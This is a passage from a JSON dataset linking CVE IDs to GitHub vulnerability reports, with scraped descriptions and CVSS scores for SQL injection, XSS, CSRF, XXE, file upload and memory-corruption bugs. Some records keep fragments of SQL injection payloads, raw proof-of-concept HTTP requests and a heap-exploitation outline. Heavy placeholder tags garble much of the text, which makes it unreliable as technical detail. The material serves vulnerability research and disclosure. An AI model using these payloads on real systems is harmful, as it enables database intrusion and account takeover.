Disposition: form data; name=\"province NUMBERTAG Content Disposition: form data; name=\"city NUMBERTAG Content Disposition: form data; name=\"district NUMBERTAG Content Disposition: form data; name=\"pcd_all NUMBERTAG Content Disposition: form data; name=\"usd_address NUMBERTAG exp code: payload1:' WHERE NUMBERTAG AND NUMBERTAG SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END)) APITAG payload2:' WHERE NUMBERTAG RLIKE SLEEP NUMBERTAG APITAG FILETAG",
  49903. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49904. "severity": "HIGH",
  49905. "baseScore": 8.8,
  49906. "impactScore": 5.9,
  49907. "exploitabilityScore": 2.8
  49908. },
  49909. {
  49910. "CVE_ID": "CVE-2020-18477",
  49911. "Issue_Url_old": "https://github.com/joelister/bug/issues/8",
  49912. "Issue_Url_new": "https://github.com/joelister/bug/issues/8",
  49913. "Repo_new": "joelister/bug",
  49914. "Issue_Created_At": "2019-04-30T09:42:52Z",
  49915. "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG APITAG the user logs in, Hucart cms NUMBERTAG does not securely filter the message content \"con_content\" field in APITAG Consultation\", resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG exp code Payload: con_title NUMBERTAG con_content= APITAG NUMBERTAG APITAG '||(SELECT NUMBERTAG d NUMBERTAG c FROM DUAL WHERE NUMBERTAG AND NUMBERTAG submit= %E NUMBERTAG F NUMBERTAG E4%BA%A4 FILETAG",
  49916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49917. "severity": "HIGH",
  49918. "baseScore": 8.8,
  49919. "impactScore": 5.9,
  49920. "exploitabilityScore": 2.8
  49921. },
  49922. {
  49923. "CVE_ID": "CVE-2020-18544",
  49924. "Issue_Url_old": "https://github.com/FeMiner/wms/issues/5",
  49925. "Issue_Url_new": "https://github.com/feminer/wms/issues/5",
  49926. "Repo_new": "feminer/wms",
  49927. "Issue_Created_At": "2019-03-07T13:19:28Z",
  49928. "description": "SQL Injection vulnerability in FILETAG !!!. A critical SQL Injection vulnerability was found in APITAG The parameter \"username\" is passed without filtering to SQL sentence which causes the vulnerability. Hackers can exploit it without authority to get access to your database FILETAG",
  49929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49930. "severity": "CRITICAL",
  49931. "baseScore": 9.8,
  49932. "impactScore": 5.9,
  49933. "exploitabilityScore": 3.9
  49934. },
  49935. {
  49936. "CVE_ID": "CVE-2020-18646",
  49937. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/5",
  49938. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/5",
  49939. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49940. "Issue_Created_At": "2019-03-11T08:50:10Z",
  49941. "description": "APITAG APITAG Disclosure Vuln. There are two Path Disclosure Vulnerabilities. Download: URLTAG NUMBERTAG Root path disclosure. Visit \" URLTAG \" to install it step by step, the installation is complete and then we can find root path as follows: FILETAG FILETAG view source: FILETAG NUMBERTAG Web path disclosure. URLTAG URLTAG FILETAG FILETAG",
  49942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49943. "severity": "HIGH",
  49944. "baseScore": 7.5,
  49945. "impactScore": 3.6,
  49946. "exploitabilityScore": 3.9
  49947. },
  49948. {
  49949. "CVE_ID": "CVE-2020-18648",
  49950. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/7",
  49951. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/7",
  49952. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49953. "Issue_Created_At": "2019-03-12T10:00:51Z",
  49954. "description": "APITAG NUMBERTAG CSRF Vuln. There is a CSRF vulnerability in APITAG NUMBERTAG endor: FILETAG EXP CODETAG Demo FILETAG FILETAG Fix Add a Token authentication...",
  49955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49956. "severity": "HIGH",
  49957. "baseScore": 8.8,
  49958. "impactScore": 5.9,
  49959. "exploitabilityScore": 2.8
  49960. },
  49961. {
  49962. "CVE_ID": "CVE-2020-18648",
  49963. "Issue_Url_old": "https://github.com/GodEpic/JuQingCMS/issues/1",
  49964. "Issue_Url_new": "https://github.com/godepic/juqingcms/issues/1",
  49965. "Repo_new": "godepic/juqingcms",
  49966. "Issue_Created_At": "2019-03-14T08:21:02Z",
  49967. "description": "Bug: APITAG NUMBERTAG CSRF NUMBERTAG Hi, I would like to report CSRF vulnerability in APITAG NUMBERTAG There is a CSRF vulnerability that can be added to modify administrator accounts. POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC FILETAG FILETAG APITAG modification FILETAG fix: Sensitive operations require validation codes, and changing passwords requires validation of old passwords.",
  49968. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49969. "severity": "HIGH",
  49970. "baseScore": 8.8,
  49971. "impactScore": 5.9,
  49972. "exploitabilityScore": 2.8
  49973. },
  49974. {
  49975. "CVE_ID": "CVE-2020-18657",
  49976. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1310",
  49977. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1310",
  49978. "Repo_new": "getsimplecms/getsimplecms",
  49979. "Issue_Created_At": "2019-05-05T09:11:28Z",
  49980. "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG any url redirection in function redirect Limited Reflective xss in function redirect Reflective xss in FILETAG Reflective xss in FILETAG the details of these vulnerabilities to see FILETAG",
  49981. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49982. "severity": "MEDIUM",
  49983. "baseScore": 6.1,
  49984. "impactScore": 2.7,
  49985. "exploitabilityScore": 2.8
  49986. },
  49987. {
  49988. "CVE_ID": "CVE-2020-18661",
  49989. "Issue_Url_old": "https://github.com/gnuboard/gnuboard5/issues/43",
  49990. "Issue_Url_new": "https://github.com/gnuboard/gnuboard5/issues/43",
  49991. "Repo_new": "gnuboard/gnuboard5",
  49992. "Issue_Created_At": "2019-04-29T09:24:29Z",
  49993. "description": "Some security vulnerabilities in NUMBERTAG Some security vulnerabilities in NUMBERTAG limited Reflective xss in FILETAG Reflective xss in FILETAG SQL injection in FILETAG the details of these vulnerabilities to see FILETAG",
  49994. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49995. "severity": "MEDIUM",
  49996. "baseScore": 6.1,
  49997. "impactScore": 2.7,
  49998. "exploitabilityScore": 2.8
  49999. },
  50000. {
  50001. "CVE_ID": "CVE-2020-18670",
  50002. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/7406",
  50003. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/7406",
  50004. "Repo_new": "roundcube/roundcubemail",
  50005. "Issue_Created_At": "2020-05-29T04:29:34Z",
  50006. "description": "security issue. I found some security issues in roundcobe NUMBERTAG I'm sorry I didn't find a way to submit a security issue, should I submit it directly via github issue?",
  50007. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50008. "severity": "MEDIUM",
  50009. "baseScore": 5.4,
  50010. "impactScore": 2.7,
  50011. "exploitabilityScore": 2.3
  50012. },
  50013. {
  50014. "CVE_ID": "CVE-2020-18693",
  50015. "Issue_Url_old": "https://github.com/MineWeb/MineWebCMS/issues/123",
  50016. "Issue_Url_new": "https://github.com/mineweb/minewebcms/issues/123",
  50017. "Repo_new": "mineweb/minewebcms",
  50018. "Issue_Created_At": "2019-03-18T08:41:34Z",
  50019. "description": "APITAG in APITAG Affected APITAG Type of vulnerability: XSS APITAG Discovered by: Ryan0lb details: Open this url \u201c URLTAG \u201c and login in FILETAG and Click the APITAG and view the News we can add a new article FILETAG We can control this parameter via \"title\",and we can insert the APITAG APITAG \" in title FILETAG finally,submit! The malicious javascript payload executed for it successlly FILETAG and open the article's url:\" URLTAG APITAG malicious javascript payload executed for it successlly too FILETAG Without any filtering on publish the article, we can easily trigger malicious XSS Payload and attack every visitor maliciously.",
  50020. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50021. "severity": "MEDIUM",
  50022. "baseScore": 5.4,
  50023. "impactScore": 2.7,
  50024. "exploitabilityScore": 2.3
  50025. },
  50026. {
  50027. "CVE_ID": "CVE-2020-18694",
  50028. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/5",
  50029. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/5",
  50030. "Repo_new": "ignitedcms/ignitedcms",
  50031. "Issue_Created_At": "2019-03-28T09:20:36Z",
  50032. "description": "There is one CSRF vulnerabilities that can change the user's password(include admin). There is one CSRF vulnerabilities that can change the user's password(include admin) Poc: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  50033. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50034. "severity": "HIGH",
  50035. "baseScore": 8.8,
  50036. "impactScore": 5.9,
  50037. "exploitabilityScore": 2.8
  50038. },
  50039. {
  50040. "CVE_ID": "CVE-2020-18698",
  50041. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/27",
  50042. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/27",
  50043. "Repo_new": "talelin/lin-cms-flask",
  50044. "Issue_Created_At": "2019-03-14T13:54:47Z",
  50045. "description": "Login brute force Vulnerability in Latest Release. Hi, I would like to report login brute force vulnerability in latest release. Description: Login brute force vulnerability in PATHTAG NUMBERTAG line APITAG function. No need to limit the number of logins and set the verification code will cause the username and password to be brute force, like this: FILETAG author by jin. EMAILTAG .cn",
  50046. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50047. "severity": "CRITICAL",
  50048. "baseScore": 9.8,
  50049. "impactScore": 5.9,
  50050. "exploitabilityScore": 3.9
  50051. },
  50052. {
  50053. "CVE_ID": "CVE-2020-18699",
  50054. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/28",
  50055. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/28",
  50056. "Repo_new": "talelin/lin-cms-flask",
  50057. "Issue_Created_At": "2019-03-14T14:10:04Z",
  50058. "description": "Cross Site Scripting Vulnerability in Latest Release . Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in PATHTAG NUMBERTAG line APITAG function and PATHTAG NUMBERTAG line APITAG function. User name usage XSS payload will be executed in the log when registering users Steps To Reproduce: APITAG a user, the username is xss payload. FILETAG APITAG use the username login, see the log manager find the xss payload already executed, the super user also can find. FILETAG author by jin. EMAILTAG .cn",
  50059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50060. "severity": "MEDIUM",
  50061. "baseScore": 6.1,
  50062. "impactScore": 2.7,
  50063. "exploitabilityScore": 2.8
  50064. },
  50065. {
  50066. "CVE_ID": "CVE-2020-18701",
  50067. "Issue_Url_old": "https://github.com/TaleLin/lin-cms-flask/issues/30",
  50068. "Issue_Url_new": "https://github.com/talelin/lin-cms-flask/issues/30",
  50069. "Repo_new": "talelin/lin-cms-flask",
  50070. "Issue_Created_At": "2019-03-14T14:24:59Z",
  50071. "description": "Identity authentication vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Identity authentication vulnerability in the logout, When you log out, the authentication token is still valid. Steps To Reproduce: APITAG the background NUMBERTAG Do something, like list users APITAG APITAG packet, can see the user list. FILETAG author by jin. EMAILTAG .cn",
  50072. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50073. "severity": "CRITICAL",
  50074. "baseScore": 9.8,
  50075. "impactScore": 5.9,
  50076. "exploitabilityScore": 3.9
  50077. },
  50078. {
  50079. "CVE_ID": "CVE-2020-18702",
  50080. "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/675",
  50081. "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/675",
  50082. "Repo_new": "quokkaproject/quokka",
  50083. "Issue_Created_At": "2019-03-21T08:21:29Z",
  50084. "description": "Cross Site Scripting Vulnerability in Latest Release. Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability PATHTAG NUMBERTAG line, Because there is no filter username. The vulnerability code is: CODETAG Steps To Reproduce: APITAG a user, username is xss payload, like: APITAG alert NUMBERTAG APITAG APITAG the username and Create user profile block, then trigger the payload. FILETAG FILETAG author by jin. EMAILTAG .cn",
  50085. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50086. "severity": "MEDIUM",
  50087. "baseScore": 6.1,
  50088. "impactScore": 2.7,
  50089. "exploitabilityScore": 2.8
  50090. },
  50091. {
  50092. "CVE_ID": "CVE-2020-18703",
  50093. "Issue_Url_old": "https://github.com/rochacbruno/quokka/issues/676",
  50094. "Issue_Url_new": "https://github.com/quokkaproject/quokka/issues/676",
  50095. "Repo_new": "quokkaproject/quokka",
  50096. "Issue_Created_At": "2019-03-21T08:49:11Z",
  50097. "description": "XML External Entity (XXE) Vulnerability in Latest Release. Hi, I would like to report XML External Entity (XXE) vulnerability in latest release. Description: XML External Entity (XXE) vulnerability in PATHTAG NUMBERTAG line and PATHTAG NUMBERTAG line, Because there is no filter authors, title. Steps To Reproduce: APITAG a article, title and authors can insert XML payload. APITAG the url: URLTAG {author}/index.rss URLTAG APITAG can see the title and authors has inserted into the XML. FILETAG FILETAG FILETAG author by jin. EMAILTAG .cn",
  50098. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50099. "severity": "CRITICAL",
  50100. "baseScore": 9.8,
  50101. "impactScore": 5.9,
  50102. "exploitabilityScore": 3.9
  50103. },
  50104. {
  50105. "CVE_ID": "CVE-2020-18704",
  50106. "Issue_Url_old": "https://github.com/fusionbox/django-widgy/issues/387",
  50107. "Issue_Url_new": "https://github.com/fusionbox/django-widgy/issues/387",
  50108. "Repo_new": "fusionbox/django-widgy",
  50109. "Issue_Created_At": "2019-07-09T08:11:03Z",
  50110. "description": "Unrestricted File Upload Vulnerability in demo site. Hi, I would like to report unrestricted file upload vulnerability in demo site. Description: Unrestricted File Upload Vulnerability in demo site image widget. Steps To Reproduce NUMBERTAG First in the page builder create a image widget and edit it. FILETAG NUMBERTAG Then upload file, you can upload any file you want. FILETAG NUMBERTAG Find you upload file URL FILETAG NUMBERTAG Open the URL you can see the page execution FILETAG author by jin. EMAILTAG .cn",
  50111. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50112. "severity": "CRITICAL",
  50113. "baseScore": 9.8,
  50114. "impactScore": 5.9,
  50115. "exploitabilityScore": 3.9
  50116. },
  50117. {
  50118. "CVE_ID": "CVE-2020-18730",
  50119. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/4",
  50120. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/4",
  50121. "Repo_new": "airpig2011/iec104",
  50122. "Issue_Created_At": "2019-03-17T14:51:32Z",
  50123. "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use prenny desock URLTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket APITAG , there will be a SEGV during the running. APITAG The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG",
  50124. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50125. "severity": "HIGH",
  50126. "baseScore": 7.5,
  50127. "impactScore": 3.6,
  50128. "exploitabilityScore": 3.9
  50129. },
  50130. {
  50131. "CVE_ID": "CVE-2020-18731",
  50132. "Issue_Url_old": "https://github.com/airpig2011/IEC104/issues/5",
  50133. "Issue_Url_new": "https://github.com/airpig2011/iec104/issues/5",
  50134. "Repo_new": "airpig2011/iec104",
  50135. "Issue_Created_At": "2019-03-18T02:47:00Z",
  50136. "description": "SEGV in function APITAG Hello. I built protocol IEC NUMBERTAG in my ubuntu NUMBERTAG machine with APITAG APITAG before make) . And I use [prenny desock NUMBERTAG tool to build channels socket communication to the console. But when I use the following as the input to the server socket NUMBERTAG there will be a SEGV during the running. APITAG The command line is as follows: PATHTAG ./iec NUMBERTAG monitor m server n NUMBERTAG test_input where APITAG is the lib of asan, APITAG is the lib of preeny desock APITAG is the binaray file which contains the test input The run time error information is: ERRORTAG I use gdb to debug it and the information is as following: CODETAG NUMBERTAG URLTAG",
  50137. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50138. "severity": "HIGH",
  50139. "baseScore": 7.5,
  50140. "impactScore": 3.6,
  50141. "exploitabilityScore": 3.9
  50142. },
  50143. {
  50144. "CVE_ID": "CVE-2020-18734",
  50145. "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
  50146. "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/476",
  50147. "Repo_new": "eclipse-cyclonedds/cyclonedds",
  50148. "Issue_Created_At": "2020-04-07T15:49:06Z",
  50149. "description": "Stack buffer overflow was found at PATHTAG in nn_bitset_one.. I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A stack buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG I guess it is a potential vulnerability in cyclone project. Please detect whether it is a problem. Thanks!",
  50150. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50151. "severity": "HIGH",
  50152. "baseScore": 7.5,
  50153. "impactScore": 3.6,
  50154. "exploitabilityScore": 3.9
  50155. },
  50156. {
  50157. "CVE_ID": "CVE-2020-18735",
  50158. "Issue_Url_old": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
  50159. "Issue_Url_new": "https://github.com/eclipse-cyclonedds/cyclonedds/issues/501",
  50160. "Repo_new": "eclipse-cyclonedds/cyclonedds",
  50161. "Issue_Created_At": "2020-04-21T12:54:33Z",
  50162. "description": "Heap buffer overflow was found at PATHTAG I used Peach Fuzzer to fuzz the APITAG at PATHTAG After a period of time, A heap buffer overflow crash was found by APITAG Next is the full crash information. ERRORTAG And this problem was found in version NUMBERTAG I guess the problem was in function APITAG I did the similar fuzz operation on version NUMBERTAG too, but the new version does not have this vulnerability. But I found some similar code around the vulnerability position in the new version. I am not sure why NUMBERTAG has the vulnerability and NUMBERTAG doe not have it.",
  50163. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  50164. "severity": "HIGH",
  50165. "baseScore": 7.5,
  50166. "impactScore": 3.6,
  50167. "exploitabilityScore": 3.9
  50168. },
  50169. {
  50170. "CVE_ID": "CVE-2020-18737",
  50171. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2289",
  50172. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2289",
  50173. "Repo_new": "typora/typora-issues",
  50174. "Issue_Created_At": "2019-03-17T10:04:54Z",
  50175. "description": "APITAG XSS to RCE. Tested On Windows NUMBERTAG ersion NUMBERTAG FILETAG XSS NUMBERTAG mermaid graph LR id1 FILETAG RCE NUMBERTAG mermaid graph LR id1 FILETAG FILETAG",
  50176. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50177. "severity": "MEDIUM",
  50178. "baseScore": 6.1,
  50179. "impactScore": 2.7,
  50180. "exploitabilityScore": 2.8
  50181. },
  50182. {
  50183. "CVE_ID": "CVE-2020-18741",
  50184. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/19",
  50185. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/19",
  50186. "Repo_new": "thinksaas/thinksaas",
  50187. "Issue_Created_At": "2019-03-18T12:48:35Z",
  50188. "description": "Thinksns Overrides the Right to Modify the Photo Description of Albums thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0. Thinksns Overrides the Right to Modify the Photo Description of Albums POST Packet: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: Your landing cookie APITAG Get parameters: Log in to demo on the official website, select an album: URLTAG enter an album: URLTAG click on an image: URLTAG photoid NUMBERTAG B NUMBERTAG D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc NUMBERTAG B NUMBERTAG D parameter. PATHTAG thinksns\u8d8a\u6743\u4fee\u6539\u76f8\u518c\u56fe\u7247\u63cf\u8ff0 POST\u6570\u636e\u5305\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: \u4f60\u7684\u767b\u9646cookie APITAG \u83b7\u53d6\u53c2\u6570\uff1a\u5728\u5b98\u7f51demo\u767b\u9646\uff0c\u9009\u62e9\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u8fdb\u5165\u4e00\u4e2a\u76f8\u518c\uff1a URLTAG \uff0c\u5728\u70b9\u51fb\u4e00\u4e2a\u56fe\u7247\uff1a URLTAG APITAG",
  50189. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  50190. "severity": "MEDIUM",
  50191. "baseScore": 5.3,
  50192. "impactScore": 1.4,
  50193. "exploitabilityScore": 3.9
  50194. },
  50195. {
  50196. "CVE_ID": "CVE-2020-18746",
  50197. "Issue_Url_old": "https://github.com/kk98kk0/exploit/issues/3",
  50198. "Issue_Url_new": "https://github.com/kk98kk0/exploit/issues/3",
  50199. "Repo_new": "kk98kk0/exploit",
  50200. "Issue_Created_At": "2019-03-20T06:07:35Z",
  50201. "description": "APITAG system background sql injection vulnerability. Vulnerability description Test object NUMBERTAG website name: APITAG NUMBERTAG web: FILETAG NUMBERTAG the download link address: URLTAG NUMBERTAG ersion: aitecms NUMBERTAG rar compression package decompression Test time: March NUMBERTAG Description of vulnerability: APITAG system background SQL injection vulnerability. Background management center online message remarks, SQL injection vulnerability > Parameter: MULTIPART id ((custom) POST) > Type: AND/OR time based blind > Title: APITAG NUMBERTAG AND time based blind POC and verification Local setup environment: Install APITAG guide: FILETAG NUMBERTAG Download URLTAG NUMBERTAG the background to URLTAG the password is admin/admin NUMBERTAG erify by the following POC verification methods. Bug: APITAG Verification method: APITAG APITAG ERRORTAG Vulnerability to prove: FILETAG FILETAG Reinforcement proposal\uff1a Improve the filter function Code review\uff1a Local building environment. PATHTAG APITAG Filter function line NUMBERTAG to submit content, imperfect. FILETAG Call APITAG to check $_REQUEST FILETAG Bypass APITAG checks, bypass addslashes function checks FILETAG Connect to a Database PATHTAG FILETAG PATHTAG FILETAG Bypass SQL security checks FILETAG Finally, the editor submitted successfully FILETAG",
  50202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50203. "severity": "HIGH",
  50204. "baseScore": 7.2,
  50205. "impactScore": 5.9,
  50206. "exploitabilityScore": 1.2
  50207. },
  50208. {
  50209. "CVE_ID": "CVE-2020-18748",
  50210. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2226",
  50211. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2226",
  50212. "Repo_new": "typora/typora-issues",
  50213. "Issue_Created_At": "2019-02-26T15:20:01Z",
  50214. "description": "NUMBERTAG SS to RCE. Windows NUMBERTAG APITAG payload CODETAG PS. \u9700\u8981\u4f60\u70b9\u4e00\u4e0b FILETAG",
  50215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50216. "severity": "MEDIUM",
  50217. "baseScore": 6.1,
  50218. "impactScore": 2.7,
  50219. "exploitabilityScore": 2.8
  50220. },
  50221. {
  50222. "CVE_ID": "CVE-2020-18750",
  50223. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/22",
  50224. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/22",
  50225. "Repo_new": "flexpaper/pdf2json",
  50226. "Issue_Created_At": "2019-03-20T02:55:13Z",
  50227. "description": "HEAP OVERFLOW VULNERABILITY. In APITAG !pst APITAG sizeof(tok3), &n3) || //sizeof(tok NUMBERTAG here n3 can be a value from NUMBERTAG to NUMBERTAG In APITAG APITAG tok NUMBERTAG n NUMBERTAG i); In APITAG if (n APITAG = APITAG { APITAG = APITAG NUMBERTAG APITAG = APITAG ) APITAG APITAG APITAG } map[code NUMBERTAG APITAG = code; APITAG = n NUMBERTAG The parameter n of void APITAG code, char APITAG int n, int offset) can be a bigger value than the the limited value APITAG In APITAG APITAG NUMBERTAG offset; Using the sample pdf file , we can find the VUL clearly. APITAG NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG f0 pwndbg> p APITAG NUMBERTAG c NUMBERTAG u NUMBERTAG len NUMBERTAG pwndbg> p APITAG NUMBERTAG so APITAG NUMBERTAG which makes the array Unicode APITAG as follows oob write. define APITAG NUMBERTAG struct APITAG { APITAG c; Unicode APITAG int len; }; So, we can modify memory from offset NUMBERTAG to NUMBERTAG with type unsigned int by adding the original value with offset, which can still be controlled. Local command execution is possible using heap fengshui, especially in the linux machine using glibc version NUMBERTAG Free a chunk using the bigger fake size can lead to continuously heap buf overflow, which can make the hacker get a memory containing the function pointer and then achieve the purpose of command execution.",
  50228. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50229. "severity": "HIGH",
  50230. "baseScore": 7.8,
  50231. "impactScore": 5.9,
  50232. "exploitabilityScore": 1.8
  50233. },
  50234. {
  50235. "CVE_ID": "CVE-2020-18766",
  50236. "Issue_Url_old": "https://github.com/AntSwordProject/antSword/issues/147",
  50237. "Issue_Url_new": "https://github.com/antswordproject/antsword/issues/147",
  50238. "Repo_new": "antswordproject/antsword",
  50239. "Issue_Created_At": "2019-04-11T17:33:14Z",
  50240. "description": "There is RCE Vulnerability in APITAG \u60f3\u4ea4\u67d0VE\uff0c\u6240\u4ee5\u4e0b\u9762\u5c31\u7528\u82f1\u6587\u5148\u5199\u4e86 When i connect to my webshell by antsword.If the connection fails, APITAG will echo error information. like this FILETAG this information don't have xss protect,so i can xss and execute system command My poc ERRORTAG FILETAG My exp (for perl) ERRORTAG base NUMBERTAG decode code ERRORTAG getshell FILETAG PATHTAG NUMBERTAG ERRORTAG add xss protect",
  50241. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  50242. "severity": "CRITICAL",
  50243. "baseScore": 9.6,
  50244. "impactScore": 6.0,
  50245. "exploitabilityScore": 2.8
  50246. },
  50247. {
  50248. "CVE_ID": "CVE-2020-18771",
  50249. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/756",
  50250. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/756",
  50251. "Repo_new": "exiv2/exiv2",
  50252. "Issue_Created_At": "2019-03-25T03:52:31Z",
